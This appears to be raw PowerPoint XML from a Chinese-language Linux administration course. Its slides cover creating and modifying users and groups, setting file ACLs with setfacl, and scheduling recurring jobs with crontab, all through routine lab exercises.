              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (GID:510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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -G 510 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.usermod -l foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.usermod -u 560 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csii</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5.useradd -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csiw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>6.usermod -d /home/csiw1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csiw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8029365"/>
      </p:ext>
    </p:extLst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-u 520 Alan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-u 521 Andy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-u 530 Aries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groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -g 540 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>steven</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Bard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>groupmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Bol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Bard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Alan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -r Andy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>groupdel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Bo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3842591"/>
      </p:ext>
    </p:extLst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 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>group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sysadms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>#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natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>#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harry -G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>#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sarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -s /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nologin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# id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>; id harry; id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認使用者是否有完成設定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># tail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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認使用者是否有完成設定，且在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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案裡</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>#for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n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> harry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ;do echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>redhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> | 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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> $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; don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1005007"/>
      </p:ext>
    </p:extLst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="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>顯示的資料前面加上 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>的，代表這個檔案的預設屬性，包括檔名、檔案擁有者與檔案所屬群組。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mask::r-x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>此檔案預設的有效權限 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(mask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="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>這裡就是新增的部分！多了這個群組的權限設定！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2580615"/>
      </p:ext>
    </p:extLst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setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以設定某個目錄或檔案的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>規範</a:t>
            </a:r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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>setfacl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檔案名稱或目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m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>設定一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>規範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x  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>取消一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>規範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b  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>取消</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>acl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參數設定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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>  設定預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>只對目錄有效，該目錄新增的檔案都會套用本預設值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對個人 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>–m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>帳號名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案名稱及目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對群組 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-m g:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>群組名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案名稱及目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>mask –m m: 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案名稱及目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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1289887"/>
      </p:ext>
    </p:extLst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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(CUR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值為</a:t>
            </a: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--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user:gy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具有資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(CUR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>下方檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(s2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>的權限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3052454"/>
      </p:ext>
    </p:extLst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/pack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch /pack/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>paee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch /pack/page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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> su01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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> su02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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> su03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setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -m u:su01:rx /pack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setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -m u:su02:rw /pack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setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -m u:su03:r /pack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getfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> /pack/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5122296"/>
      </p:ext>
    </p:extLst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tc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a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m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etfacl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a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m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etfacl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-m user(u):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natasha:rw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a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m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etfacl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-m user(u):harry:-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a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m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getfacl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va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m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fstab</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1400" kern="1200" dirty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8231625"/>
      </p:ext>
    </p:extLst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crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t>循環工作排程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="1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crontab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選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t>所有用戶均可操作的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>：檢查排程列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：指定使用者身份執行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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 新增排程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3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49575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8509235"/>
      </p:ext>
    </p:extLst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TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>輸入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每天的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>14:23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分 顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hello Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的字在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CLI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>介面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23(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) 14(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>時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日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月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週</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> /bin/echo Hello Linux(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令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23 14 * * * /bin/echo Hello Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>週</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0,7:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期日、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期四</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期五、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期六</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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9825972"/>
      </p:ext>
    </p:extLst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3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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80209147"/>
      </p:ext>
    </p:extLst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u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natasha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lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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rontab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e //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新增排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程</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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輸入內容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3 14  *   *   *       /bin/echo Hello Linux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lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分 時  日 月  週      指令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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rontab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–l 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/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檢查排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程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列表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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exit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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
